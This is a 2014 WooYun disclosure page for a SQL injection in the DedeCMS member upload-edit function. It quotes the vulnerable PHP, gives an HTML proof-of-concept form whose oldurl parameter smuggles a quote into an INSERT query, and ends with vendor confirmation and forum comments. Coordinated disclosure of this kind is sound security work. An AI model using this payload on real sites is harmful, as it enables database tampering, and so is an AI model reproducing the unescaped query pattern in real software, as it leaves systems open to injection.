当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(29) 关注此漏洞

缺陷编号: WooYun-2014-48894

漏洞标题: Dedecms 会员中心注入漏洞7

相关厂商: Dedecms

漏洞作者: Matt认证白帽子

提交时间: 2014-01-14 17:16

公开时间: 2014-04-14 17:17

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

0人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-14: 细节已通知厂商并且等待厂商处理中
2014-01-14: 厂商已经确认,细节仅向厂商公开
2014-01-17: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-03-10: 细节向核心白帽子及相关领域专家公开
2014-03-20: 细节向普通白帽子公开
2014-03-30: 细节向实习白帽子公开
2014-04-14: 细节向公众公开

简要描述:

我是来继续做贡献的~

详细说明:

code 区域
member/upload_edit.php


else if($dopost=='save')


{


    $title = HtmlReplace($title,2);


    if($mediatype==1) $utype = 'image';


    else if($mediatype==2)


    {


        $utype = 'flash';


    }


    else if($mediatype==3)


    {


        $utype = 'media';


    }


    else


    {


        $utype = 'addon';


    }


    $title = HtmlReplace($title, 2);


    $exname = preg_replace("#(.*)/#", "", $oldurl);// 文件名是获取.前面的


    $exname = preg_replace("#\.(.*)$#", "", $exname);


	echo $exname ;


    $filename = MemberUploads('addonfile', $oldurl, $cfg_ml->M_ID, 





$utype,$exname, -1, -1, TRUE);//返回上传的文件名


    SaveUploadInfo($title, $filename, $mediatype);//利用返回的带入查询


    ShowMsg("成功修改文件!", "uploads_edit.php?aid=$aid");


}











function SaveUploadInfo($title,$filename,$medaitype=1,$addinfos='')


{


    global $dsql,$cfg_ml,$cfg_basedir;


    if($filename=='')


    {


        return FALSE;


    }


    if(!is_array($addinfos))


    {


        $addinfos[0] = $addinfos[1] = $addinfos[2] = 0;


    }


    if($medaitype==1)


    {


        $info = '';


        $addinfos = GetImageSize($cfg_basedir.$filename,$info);


    }


    $addinfos[2] = @filesize($cfg_basedir.$filename);


    $row = $dsql->GetOne("SELECT aid,title,url FROM `#@__uploads` WHERE url 





LIKE '$filename' AND mid='".$cfg_ml->M_ID."'; ");


    $uptime = time();


    if(is_array($row))


    {


        $query = "UPDATE `#@__uploads` SET 





title='$title',mediatype='$medaitype',


                     width='{$addinfos[0]}',height='{$addinfos





[1]}',filesize='{$addinfos[2]}',uptime='$uptime'


                     WHERE aid='{$row['aid']}'; ";


        $dsql->ExecuteNoneQuery($query);


    }


    else


    {


        $inquery = "INSERT INTO `#@__uploads`





(title,url,mediatype,width,height,playtime,filesize,uptime,mid)


           VALUES ('$title','$filename','$medaitype','".$addinfos





[0]."','".$addinfos[1]."','0','".$addinfos[2]."','$uptime','".$cfg_ml-





>M_ID."'); ";echo $inquery ;//注入就在这里发生了!


        $dsql->ExecuteNoneQuery($inquery);


    }


    $fid = $dsql->GetLastID();


    AddMyAddon($fid, $filename);


    return TRUE;


}

漏洞证明:

code 区域
利用方法


<form id="frmUpload" enctype="multipart/form-data" 





action="**.**.**.**/dede/member/uploads_edit.php?





dopost=save&title=ss&oldurl=1'.php" method="post">看Oldurl就知道了~








<input type="file" name="addonfile" id="addonfile" size="50"><br>


<input name="mode" type="hidden" value="2">





<input id="btnUpload" type="submit" value="Upload">





</form>



1.png

修复方案:

过滤啊!

版权声明:转载请注明来源 Matt@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-01-14 22:24

厂商回复:

已修复,感谢反馈

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2014-01-14 17:17 | 坠落 ( 路人 | Rank:0 漏洞数:2 | 恩。。。。。。。)
    0

    洞主 尔甚叼 令尊知否

    1# 回复此人
  2. 2014-01-14 17:18 | 4399gdww ( 路人 | Rank:20 漏洞数:4 | )
    0

    坐等8

    2# 回复此人
  3. 2014-01-14 17:19 | Matt 认证白帽子 ( 普通白帽子 | Rank:523 漏洞数:107 | 承接代码审计 http://codescan.cn/)
    0

    @坠落 此小事 无须知

    3# 回复此人
  4. 2014-01-14 17:20 | 摸了你 ( 实习白帽子 | Rank:71 漏洞数:17 | 1shitMVqBjCKrnRvSoixMx6RKpG9J8pBM)
    0

    ...赤果果的刷。

    4# 回复此人
  5. 2014-01-14 17:20 | 坠落 ( 路人 | Rank:0 漏洞数:2 | 恩。。。。。。。)
    1

    @Matt 洞主 此话让我 不明觉厉

    5# 回复此人
  6. 2014-01-14 17:21 | wefgod ( 核心白帽子 | Rank:1825 漏洞数:183 | 力不从心)
    0

    我去?还在继续啊

    6# 回复此人
  7. 2014-01-14 17:27 | onlycjeg ( 实习白帽子 | Rank:38 漏洞数:5 )
    0

    疯了吧,都7个了!~~

    7# 回复此人
  8. 2014-01-14 17:31 | Gosuto ( 实习白帽子 | Rank:40 漏洞数:5 | )
    0

    洞主略屌啊

    8# 回复此人
  9. 2014-01-14 17:37 | 3King ( 普通白帽子 | Rank:1143 漏洞数:95 | 【study at HNUST】非常感谢大家的关注~ 大...)
    0

    完全停不下来的说......

    9# 回复此人
  10. 2014-01-14 17:51 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:104 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)
    0

    会员中心有7个文件吗?不是同一文件多次不算得啊!

    10# 回复此人
  11. 2014-01-14 17:55 | zph ( 普通白帽子 | Rank:243 漏洞数:44 )
    0

    吊炸天了。。

    11# 回复此人
  12. 2014-01-14 17:58 | px1624 ( 普通白帽子 | Rank:1104 漏洞数:186 | px1624)
    0

    一个2k,7个1W4

    12# 回复此人
  13. 2014-01-14 18:12 | 封印师 ( 路人 | Rank:4 漏洞数:3 | # the world, the data.)
    0

    刷屏了,屌!

    13# 回复此人
  14. 2014-01-14 18:12 | Fireweed ( 普通白帽子 | Rank:107 漏洞数:14 | Show me the #)
    0

    会员中心有7个文件吗?不是同一文件多次不算得啊!

    14# 回复此人
  15. 2014-01-14 18:17 | 摸了你 ( 实习白帽子 | Rank:71 漏洞数:17 | 1shitMVqBjCKrnRvSoixMx6RKpG9J8pBM)
    0

    @px1624 wooyun快被dz刷穷了

    15# 回复此人
  16. 2014-04-14 17:19 | dave ( 实习白帽子 | Rank:73 漏洞数:12 | ส้้้้้้้้้้้้้้้้้้้...)
    0

    dedecms 注定是一个备注

    16# 回复此人

登录后才能发表评论,请先 登录